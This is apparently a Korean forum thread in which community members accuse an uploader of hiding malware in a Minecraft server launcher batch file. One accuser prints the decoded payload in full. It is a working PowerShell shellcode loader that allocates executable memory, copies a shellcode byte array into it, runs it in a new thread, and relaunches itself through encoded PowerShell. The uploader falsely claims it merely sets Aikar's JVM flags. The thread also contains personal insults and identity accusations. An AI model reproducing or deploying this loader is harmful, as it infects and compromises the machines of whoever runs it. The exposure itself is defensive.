바이러스토탈 검사 결과 말할것이 많지만 실제 가상머신환경에서는 어떠한 위협도 존재하지않았습니다. BEHAVIOR탭에 이러한 정보가있습니다. 또한 자바 애플리케이션을 바이러스토탈로 검사하는건 거짓긍정문제가 존재합니다. ex)서버엔진, 심지어 원본도 false positive로 동일한 플레그를 띄웠음. 그리고 제가 유명한 디도스범이라고 어떠한 증거없이 주장하시는것이 제가 "악성코드를 올렸다"라는 자신만의 생각에서 기인한것인지 아니면 그 반대인지는 모르겠으나 설령 Aarch라는 코드네임을 쓰는 동명이 있다고해도 공개된장소에서 그딴 소리를 내시는것은 굉장한 민폐입니다. 이상입니다.

우와 근데 이제보니까 15개씩이나 잡힌거를 그냥 올렸네 진짜 대담하다 ㅋㅋㅋㅋㅋㅋㅋ

너 Aarch, STS그룹 등 사람들이랑 관련되어있는거 다 알고있어

너가 나보다 똑똑해보여?

이제 좀 알자

내가 너보다 한수 위야

난 니가 어느 방송에서 올지도 다 알고있어

그리고 뭐? 그딴 소리 ㅋㅋㅋ?

뭐 그래 넌 좀.. 어

법정에서 보자^^

어떠한 위협도 없는 실제 실행환경입니다.

프리루트가 누군진 모르겠고 그런 구동기따위에 powershell 코드 Base64 인코딩을 쓸 이유도 없고 님 디도스범이잖아요 뭐래는거야

니가 작성한 Base64 디코드한 내용 그대로 써줄게요

$nMg = '$WFp = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $WFp -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xb8,0xcf,0x27,0xca,0xa6,0xda,0xd7,0xd9,0x74,0x24,0xf4,0x5b,0x2b,0xc9,0xb1,0x4b,0x83,0xc3,0x04,0x31,0x43,0x0e,0x03,0x8c,0x29,0x28,0x53,0xee,0xde,0x23,0x9c,0x0e,0x1f,0x5c,0x14,0xeb,0x2e,0x4e,0x42,0x78,0x02,0x5e,0x00,0x2c,0xaf,0x15,0x44,0xc4,0x9e,0xd6,0x66,0x53,0xaa,0x0e,0xf2,0xe9,0x03,0x7e,0xc4,0xa1,0x68,0xe1,0xb8,0xbb,0xbc,0xc1,0x81,0x74,0xb1,0x00,0xc5,0xc3,0xbf,0xed,0x9b,0x84,0xb4,0xa0,0x0b,0xa1,0x89,0x78,0x2d,0x65,0x86,0xc1,0x55,0x00,0x59,0xb5,0xe9,0x0b,0x8a,0xbd,0xaa,0x2b,0x7a,0x49,0x02,0x33,0x7b,0x9e,0x16,0x8a,0x0f,0x1c,0x50,0x87,0xc4,0xd7,0x63,0x41,0x15,0x17,0x52,0xad,0x97,0x28,0x98,0x81,0x19,0x70,0x9b,0x39,0x6c,0x8a,0xdf,0xc4,0x77,0x49,0x9d,0x12,0xfd,0x4e,0x05,0xd1,0xa5,0xaa,0xb7,0x36,0x33,0x38,0xbb,0xf3,0x37,0x66,0xd8,0x02,0x9b,0x1c,0xe4,0x8f,0x1a,0xf3,0x6c,0xcb,0x38,0xd7,0x35,0x88,0x21,0x4e,0x90,0x7f,0x5d,0x90,0x7c,0x20,0xfb,0xda,0x6f,0x37,0x7b,0x23,0x70,0x38,0x21,0xb4,0xbc,0xf4,0xda,0x44,0xab,0x8f,0xa9,0x76,0x74,0x3b,0x26,0x3b,0xfd,0xe5,0xb1,0x4a,0xe9,0x16,0x6d,0xf4,0x7a,0xe9,0x8e,0x05,0x52,0x2d,0xda,0x55,0xcc,0x84,0x63,0x3e,0x0c,0x29,0xb6,0xab,0x06,0xbd,0xbd,0xce,0xbf,0xc2,0xd6,0x0c,0xc0,0x3d,0x9a,0x98,0x26,0x6d,0xb4,0xca,0xf6,0xcd,0x64,0xab,0xa6,0xa5,0x6e,0x24,0x98,0xd5,0x90,0xee,0xb1,0x7f,0x7f,0x47,0xe9,0x17,0xe6,0xc2,0x61,0x86,0xe7,0xd8,0x0f,0x88,0x6c,0xef,0xf0,0x46,0x85,0x9a,0xe2,0x3e,0x65,0xd1,0x59,0xe8,0x7a,0xcf,0xf4,0x14,0xef,0xf4,0x5e,0x43,0x87,0xf6,0x87,0xa3,0x08,0x08,0xe2,0xb8,0x81,0x9c,0x4d,0xd6,0xed,0x70,0x4e,0x26,0xb8,0x1a,0x4e,0x4e,0x1c,0x7f,0x1d,0x6b,0x63,0xaa,0x31,0x20,0xf6,0x55,0x60,0x95,0x51,0x3e,0x8e,0xc0,0x96,0xe1,0x71,0x27,0x27,0xdd,0xa7,0x01,0x5d,0x0f,0x74;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$Rzu=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($Rzu.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$Rzu,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($nMg));$fuE = "-ec ";if([IntPtr]::Size -eq 8){$lymr = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $lymr $fuE $e"}else{;iex "& powershell $fuE $e";}

이게 사람을 ㅈ으로 아나? 해킹범 안잡고 뭐해요 한마포 운영자님들?

서버버킷중 가장 활성도가 높고, log4j를 처음으로 발견한 Papermc에서 공식적으로 서버를 호스팅할때 사용하도록 권장하는 Aikar's flag적용 코드입니다. 자바버전이 올라감에따라 프리루트님의 적용방식을 기존방식과 근본적으로 차이없는가상머신플래그 수정으로 변경함 실제로 백신도 거의 차이없는 방식으로 체크했고 수십줄이 넘어가는 적용코드를 배치파일에 넣기에는 너무 길이가 커져 인코딩방식을 사용했습니다. 디코딩한 문자열을 추가하겠습니다. 

니가 지금 뭘 하는지나 알고 그러니? 범죄인걸 모르나봐 심각하네 어린애도 아닌거같은데

이거나 먹자 친구야

https://www.virustotal.com/gui/file/7f93b26196931a50680efef05000b2e4087e5bab027da3e8cbc903618de641fa

디코딩된 문자열과 파일 해쉬가 다르네요? 바이러스를 직접제작해 파일에 합쳐 조작하지맙시다

니가 넣은 파일은 base64라서 그대로 txt파일에에 넣고 돌렸습니다. 파일 다운로드해보시면 압니다 내용 똑같아요

↑다운받아서 bat파일 편집 눌러보슈 못믿겠으면

Untitled.txt

판단은 알아서^^

안전하다고 말하는 37개의 백신은 그냥 무시하고 일부만 보여주시네요 판단은 알아서라뇨 ㅋㅋ

그 37개가 의미있다고 보시는데

음 ㅋㅋㅋㅋㅋㅋ

그전에 25개가 걸렀거든요?

다 똑같은 내용 "Powershell.Boxter"라고.

와 근데 반박이 싹다 가능한것만 말하는것도 쉽지 않은데 대단하시다 ㄷㄷ

너무 재밌는 경험 하게 해주셔서 감사합니다. 전 이만 자러 가요~

응 그리고 Aikar's flag는 이거다

java -Xms10G -Xmx10G -XX:+UseG1GC -XX:+ParallelRefProcEnabled -XX:MaxGCPauseMillis=200 -XX:+UnlockExperimentalVMOptions -XX:+DisableExplicitGC -XX:+AlwaysPreTouch -XX:G1NewSizePercent=30 -XX:G1MaxNewSizePercent=40 -XX:G1HeapRegionSize=8M -XX:G1ReservePercent=20 -XX:G1HeapWastePercent=5 -XX:G1MixedGCCountTarget=4 -XX:InitiatingHeapOccupancyPercent=15 -XX:G1MixedGCLiveThresholdPercent=90 -XX:G1RSetUpdatingPauseTimePercent=5 -XX:SurvivorRatio=32 -XX:+PerfDisableSharedMem -XX:MaxTenuringThreshold=1 -Dusing.aikars.flags=https://mcflags.emc.gs -Daikars.new.flags=true -jar paperclip.jar nogui

니가 적은거랑 너무 다르지 않니?^^

그리고 인코딩이 더 길어지는건 누구나 알만한 사실인데 뭐라고 하는거니 친구야 ㅋㅋㅋㅋㅋㅋㅋㅋ

10글자 인코딩하는데 수십자가 나와요 인간아 ㅋㅋㅋㅋㅋㅋㅋㅋ

배부르겠다야 또먹어라

훨씬 길지? 글ㅈ다수를 줄이려 인코딩? 진짜 사기꾼이 할만한 소리를 하는구나~

↑ 원본 프리루트님 배치파일

↑ 니가 만든 바이러스 구동기 파일

그리고 제가 바이러스를 넣는다고 쳐도 파일만 열어보면 나오는 그딴곳에 넣어놓지는 않습니다 ^^

네 그렇게 넣어 두셨어요

그리고 그만좀 떠들어요 그 안되는 머리로 진짜 얼마나 많은 핑계가 나오신다고 그러세요 이제 벌써 바닥났고만

디코딩된 문자열:

[Environment]::SetEnvironmentVariable("JAVA_OPTS", " -XX:+UseG1GC -XX:+ParallelRefProcEnabled -XX:MaxGCPauseMillis=200 -XX:+UnlockExperimentalVMOptions -XX:+DisableExplicitGC -XX:+AlwaysPreTouch -XX:G1NewSizePercent=30 -XX:G1MaxNewSizePercent=40 -XX:G1HeapRegionSize=8M -XX:G1ReservePercent=20 -XX:G1HeapWastePercent=5 -XX:G1MixedGCCountTarget=4 -XX:InitiatingHeapOccupancyPercent=15 -XX:G1MixedGCLiveThresholdPercent=90 -XX:G1RSetUpdatingPauseTimePercent=5 -XX:SurvivorRatio=32 -XX:+PerfDisableSharedMem -XX:MaxTenuringThreshold=1 -Dusing.aikars.flags=https://mcflags.emc.gs -Daikars.new.flags=true", [EnvironmentVariableTarget]::Machine)

어 미안한데 너가 디코딩 한거랑 내가 디코딩한거랑 좀 "매우" 다르구나^^

파일 바꿨냐? 바꿔치우기 전에 내용은 한마포 서버에 안남을거같지?

한마포도 이제 못쓰고 안타깝다 Aarch야

그만해이제 너 다 털렸어 ㅋㅋㅋㅋㅋㅋㅋㅋ

내가 진짜 이정도로 지식 활용 할일이 올줄은 몰랐는데 첫상대가 악질 해커범일줄은 몰랐다 진짜 꿈에도

고맙다야

그리고 저 aikars 플래그도 내가 먼저 찾았네?

어 미안 난 서버 운영하는 사람으로서 그런거 다 즐겨찾기에 있어서 니가 뭔 대든 내가 먼저 선수쳐서 너의 입으로 나불대는걸 다 방어할꺼거든 알고 있어줘

넷카마로 활동하시는 해그님 해명글을 전부 읽고 나불대주세요

죄송한데 제 방송 컨셉은 왜 언급하시죠?ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ진짜 할말이 없으신가본데 그런거 씨알도 안먹혀요 니가 해킹을 했다는게 중요하지 그게 중요합니까? 물 흐리려 하는것도 수준이 낮으시네

​​해명할게 있나? 대놓고 바이러슨데?

스머한테 실행시키려고 유도한것도 너야

base64인코딩만으로 하면 오히려 줄바꿈으로 인해 줄수가 더 늘어나고, Chatgpt를 통해 메모리를 직접쓰는 방식을 선택했습니다.

니 chatgpt 링크 내놓으세요 그럼 공유하기 해서

챗지피티 쓴적도 없는데 그냥 나불나불 ㅋㅋㅋㅋㅋㅋ

빨리 다음거 가져와